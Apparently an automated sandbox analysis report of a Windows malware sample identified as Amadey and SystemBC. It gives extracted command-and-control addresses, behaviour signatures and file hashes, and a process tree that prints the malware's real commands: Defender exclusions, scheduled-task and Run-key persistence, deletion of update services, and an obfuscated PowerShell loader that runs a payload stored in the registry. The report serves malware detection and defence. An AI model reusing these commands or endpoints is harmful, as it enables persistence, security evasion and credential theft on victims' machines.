Analysis
-
max time kernel
299s -
max time network
294s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
-
submitted
13-12-2022 05:04
General
-
Target
6aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4.exe
-
Size
5.7MB
-
MD5
8db6951a0d83c98cdf400564eb6da9f5
-
SHA1
1fcb7cb36a0acec9342f3816a223a44499ca9956
-
SHA256
6aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4
-
SHA512
a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3
-
SSDEEP
98304:BcQr0Gp9vBP9UBXjxD0V7+sHg9SPJQxYqDPZNPp0AZe2vvO1/iAozAXEqTTdj:vrpDZP+NDOXP0Y+hNRZiBozm
Malware Config
Extracted
amadey
3.50
85.209.135.109/jg94cVd30f/index.php
Extracted
systembc
89.22.236.225:4193
176.124.205.5:4193
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Modifies security service 2 TTPs 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
-
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 9 IoCs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 21 IoCs
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 43 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\6aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4.exe"C:\Users\Admin\AppData\Local\Temp\6aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4.exe"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\6aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4.exe"C:\Users\Admin\AppData\Local\Temp\6aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe" /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "Admin:N"&&CACLS "gntuud.exe" /P "Admin:R" /E&&echo Y|CACLS "..\03bd543fce" /P "Admin:N"&&CACLS "..\03bd543fce" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "gntuud.exe" /P "Admin:N"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "gntuud.exe" /P "Admin:R" /E7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\03bd543fce" /P "Admin:N"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\03bd543fce" /P "Admin:R" /E7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\1000030012\syncfiles.dll, rundll6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\1000030012\syncfiles.dll, rundll7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\1000031001\avicapn32.exe"C:\Users\Admin\AppData\Local\Temp\1000031001\avicapn32.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.execmd.exe /C schtasks /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\1000032000\umciavi32.exe"C:\Users\Admin\AppData\Roaming\1000032000\umciavi32.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000034001\Emit64.exe"C:\Users\Admin\AppData\Local\Temp\1000034001\Emit64.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main6⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- outlook_win_path
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gkucwdcha#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'nvndrivesllapi' /tr '''C:\Users\Admin\PLocktime\nvndrivesllapi.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\PLocktime\nvndrivesllapi.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'nvndrivesllapi' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "nvndrivesllapi" /t REG_SZ /f /d 'C:\Users\Admin\PLocktime\nvndrivesllapi.exe' }2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000034001\Emit64.exe"2⤵
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xtjjcgktv#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "nvndrivesllapi" } Else { "C:\Users\Admin\PLocktime\nvndrivesllapi.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn nvndrivesllapi3⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {05541320-CB6A-4F15-832D-666AF8EBFBDD} S-1-5-21-3406023954-474543476-3319432036-1000:VUIIVLGQ\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exeC:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exeC:\Users\Admin\AppData\Local\Temp\03bd543fce\gntuud.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exeC:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\taskeng.exetaskeng.exe {2B843498-CD86-4019-9D4F-FB6AAD948F61} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+'a'+[Char](108)+''+[Char](101)+'r'+[Char](115)+''+[Char](116)+'a'+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
5.7MB
MD58db6951a0d83c98cdf400564eb6da9f5
SHA11fcb7cb36a0acec9342f3816a223a44499ca9956
SHA2566aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4
SHA512a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3
-
Filesize
5.7MB
MD58db6951a0d83c98cdf400564eb6da9f5
SHA11fcb7cb36a0acec9342f3816a223a44499ca9956
SHA2566aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4
SHA512a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3
-
Filesize
5.7MB
MD58db6951a0d83c98cdf400564eb6da9f5
SHA11fcb7cb36a0acec9342f3816a223a44499ca9956
SHA2566aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4
SHA512a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3
-
Filesize
5.7MB
MD58db6951a0d83c98cdf400564eb6da9f5
SHA11fcb7cb36a0acec9342f3816a223a44499ca9956
SHA2566aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4
SHA512a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3
-
Filesize
5.7MB
MD58db6951a0d83c98cdf400564eb6da9f5
SHA11fcb7cb36a0acec9342f3816a223a44499ca9956
SHA2566aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4
SHA512a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3
-
Filesize
5.7MB
MD58db6951a0d83c98cdf400564eb6da9f5
SHA11fcb7cb36a0acec9342f3816a223a44499ca9956
SHA2566aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4
SHA512a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3
-
Filesize
5.7MB
MD5cc320704a370f208678f46083de6115b
SHA1e51aefe7d64cb2b461e570c8475338cd51b9295f
SHA25608ba1ca77e7597c4f581180dd000cd71f62657a5b158473a8c139c971ddbdfe2
SHA51295aed3ddd9ba581a7e873aed8e5d1a351d06e15bd03c68aba08a47d130ccc4f116a9649c35fba9a31935ed1065069fb2a8e7e0ee15ff5cbb70a914c6190db20d
-
Filesize
5.7MB
MD5cc320704a370f208678f46083de6115b
SHA1e51aefe7d64cb2b461e570c8475338cd51b9295f
SHA25608ba1ca77e7597c4f581180dd000cd71f62657a5b158473a8c139c971ddbdfe2
SHA51295aed3ddd9ba581a7e873aed8e5d1a351d06e15bd03c68aba08a47d130ccc4f116a9649c35fba9a31935ed1065069fb2a8e7e0ee15ff5cbb70a914c6190db20d
-
Filesize
8.8MB
MD578592d915e780eb7c445a3f797a5c6d1
SHA1c11cb328c94cff87b033086369fa3cbdf445e265
SHA25601b77c68dfe6cea48d6f3ebf717f6f3fd5bc4d38fa2853b8fa1ecbc9d31e749b
SHA51215fff137db9f0a310196ce2315566e21d91212e6019abbfa99603eef28bda635885b5987b7a548a743260051a9ef9b5e5bb755dbea53efb56d2ffec2663335a5
-
Filesize
8.8MB
MD578592d915e780eb7c445a3f797a5c6d1
SHA1c11cb328c94cff87b033086369fa3cbdf445e265
SHA25601b77c68dfe6cea48d6f3ebf717f6f3fd5bc4d38fa2853b8fa1ecbc9d31e749b
SHA51215fff137db9f0a310196ce2315566e21d91212e6019abbfa99603eef28bda635885b5987b7a548a743260051a9ef9b5e5bb755dbea53efb56d2ffec2663335a5
-
Filesize
7.2MB
MD5d121a0468485d70b575e278d407bb76e
SHA1aa632a96db84885afe0175cfaafbb7317d5fb0ac
SHA2564f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325
SHA51259c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f
-
Filesize
7.2MB
MD5d121a0468485d70b575e278d407bb76e
SHA1aa632a96db84885afe0175cfaafbb7317d5fb0ac
SHA2564f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325
SHA51259c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f
-
Filesize
7KB
MD59e44b5958ec383328b8dccde30de91e9
SHA12fd344c609cb5eded42beeb68573b9227b2c01c9
SHA2569cdd46bfd2fde95e8682c375919b84fd484bc16c3a1eb5b7298884d0bca6cac7
SHA512a8adfa546d12ae3f28c596286a72d19fcc54f0109f7b1fe897096f67d55b3ec4a62e7ca9319f06f51641d3705971af3912bda37b2cca5bad54202c091af62c91
-
Filesize
539.2MB
MD577c6d9320c76e2d05bb6d67272cf30a4
SHA1b34f103a8799d1997d31ab842ca69bcfdab877ca
SHA256370c48d2e9dd6afc40d94b7877256647aee11d039fcc1fdb035a338c56457dbc
SHA512121304e816518555123a3967cc82bf4564bbd81bb368c8fe6ceef7d40ab66b07b68fcb0c419db4ed95d25a7439bf6d1b04238d1026e61b11b70f195fec7e781b
-
Filesize
614.9MB
MD55c48f1cb0e1bc5e448162304438f3502
SHA1260eb2ec67c22f501fa15e267987cc510ffa38cc
SHA25604f04f9b5380ee5372400f35c1e02f80305670f2ebb1a5ecd568f101ffd52834
SHA512d075c51e25d1891d6c6eb01b70ff35e9ae03e2103218d12cfdcc35227d11ea92c9e3355cd6ee2e49b1664b9bfb03277ee9365f0486cd129229a0a866d6ff0fe2
-
Filesize
5.0MB
MD5bcd2b39f13299558426628c8bf813981
SHA1decff54ad6d21f632a7cee5f463a828228885b83
SHA25693d9dd45b63af44c9824877e53e5df3b6a82c88b80e25dce1bbdbb9f39e05f75
SHA512b00c1f3c86c2ffa77406baf1cf07c814ba5fc2988076a50689295083676bcc27f04e62263642cd6aab1ba9c80298c1aab11c45e534a4c637e46dca81445765d8
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
3.8MB
MD5bfdb08a3922a436009e70c93b4336cda
SHA1c29c5331047cfd8db374338e77cb5d676b2e9ccc
SHA25629662713470cfbdde9631a88c8a88f323e0d96169c0a1e4fb358379a157af7f2
SHA512fadc3456e4eaf48c8a126b12034e56d4313c1fc5cefff625c27b0ebdf08ca81f16de5a0be3922af4b365091831892d8c9ce10a7f11309f854a61b61ea8bb756e
-
Filesize
5.7MB
MD58db6951a0d83c98cdf400564eb6da9f5
SHA11fcb7cb36a0acec9342f3816a223a44499ca9956
SHA2566aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4
SHA512a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3
-
Filesize
5.7MB
MD58db6951a0d83c98cdf400564eb6da9f5
SHA11fcb7cb36a0acec9342f3816a223a44499ca9956
SHA2566aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4
SHA512a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3
-
Filesize
5.7MB
MD58db6951a0d83c98cdf400564eb6da9f5
SHA11fcb7cb36a0acec9342f3816a223a44499ca9956
SHA2566aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4
SHA512a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3
-
Filesize
5.7MB
MD58db6951a0d83c98cdf400564eb6da9f5
SHA11fcb7cb36a0acec9342f3816a223a44499ca9956
SHA2566aca23e327ea60f1036c73533c343030b5560fcd83732e965bd2ffa06eb88da4
SHA512a68007c1c2b238113120fc12ebcc3851a04bbbd08b8cd892e0ca4e579048eb9fb4e4e3f6104126dd56a8b1478ea089924aca1b0ba5203d34b2cece369314fac3
-
Filesize
5.7MB
MD5cc320704a370f208678f46083de6115b
SHA1e51aefe7d64cb2b461e570c8475338cd51b9295f
SHA25608ba1ca77e7597c4f581180dd000cd71f62657a5b158473a8c139c971ddbdfe2
SHA51295aed3ddd9ba581a7e873aed8e5d1a351d06e15bd03c68aba08a47d130ccc4f116a9649c35fba9a31935ed1065069fb2a8e7e0ee15ff5cbb70a914c6190db20d
-
Filesize
5.7MB
MD5cc320704a370f208678f46083de6115b
SHA1e51aefe7d64cb2b461e570c8475338cd51b9295f
SHA25608ba1ca77e7597c4f581180dd000cd71f62657a5b158473a8c139c971ddbdfe2
SHA51295aed3ddd9ba581a7e873aed8e5d1a351d06e15bd03c68aba08a47d130ccc4f116a9649c35fba9a31935ed1065069fb2a8e7e0ee15ff5cbb70a914c6190db20d
-
Filesize
8.8MB
MD578592d915e780eb7c445a3f797a5c6d1
SHA1c11cb328c94cff87b033086369fa3cbdf445e265
SHA25601b77c68dfe6cea48d6f3ebf717f6f3fd5bc4d38fa2853b8fa1ecbc9d31e749b
SHA51215fff137db9f0a310196ce2315566e21d91212e6019abbfa99603eef28bda635885b5987b7a548a743260051a9ef9b5e5bb755dbea53efb56d2ffec2663335a5
-
Filesize
7.2MB
MD5d121a0468485d70b575e278d407bb76e
SHA1aa632a96db84885afe0175cfaafbb7317d5fb0ac
SHA2564f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325
SHA51259c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f
-
Filesize
7.2MB
MD5d121a0468485d70b575e278d407bb76e
SHA1aa632a96db84885afe0175cfaafbb7317d5fb0ac
SHA2564f87833cc0d928320ab86ca69a57515e1b3e589ca36430f513b4524acfda3325
SHA51259c046deab1c4e6bacd59e2b14c265af32450881a2dea4253655c0421c2bf0f4f0ed2d8bd7096c0683f76585f807e647f6a0faf344236a655ac69c9dfcc2540f
-
Filesize
5.0MB
MD5bcd2b39f13299558426628c8bf813981
SHA1decff54ad6d21f632a7cee5f463a828228885b83
SHA25693d9dd45b63af44c9824877e53e5df3b6a82c88b80e25dce1bbdbb9f39e05f75
SHA512b00c1f3c86c2ffa77406baf1cf07c814ba5fc2988076a50689295083676bcc27f04e62263642cd6aab1ba9c80298c1aab11c45e534a4c637e46dca81445765d8
-
Filesize
5.0MB
MD5bcd2b39f13299558426628c8bf813981
SHA1decff54ad6d21f632a7cee5f463a828228885b83
SHA25693d9dd45b63af44c9824877e53e5df3b6a82c88b80e25dce1bbdbb9f39e05f75
SHA512b00c1f3c86c2ffa77406baf1cf07c814ba5fc2988076a50689295083676bcc27f04e62263642cd6aab1ba9c80298c1aab11c45e534a4c637e46dca81445765d8
-
Filesize
5.0MB
MD5bcd2b39f13299558426628c8bf813981
SHA1decff54ad6d21f632a7cee5f463a828228885b83
SHA25693d9dd45b63af44c9824877e53e5df3b6a82c88b80e25dce1bbdbb9f39e05f75
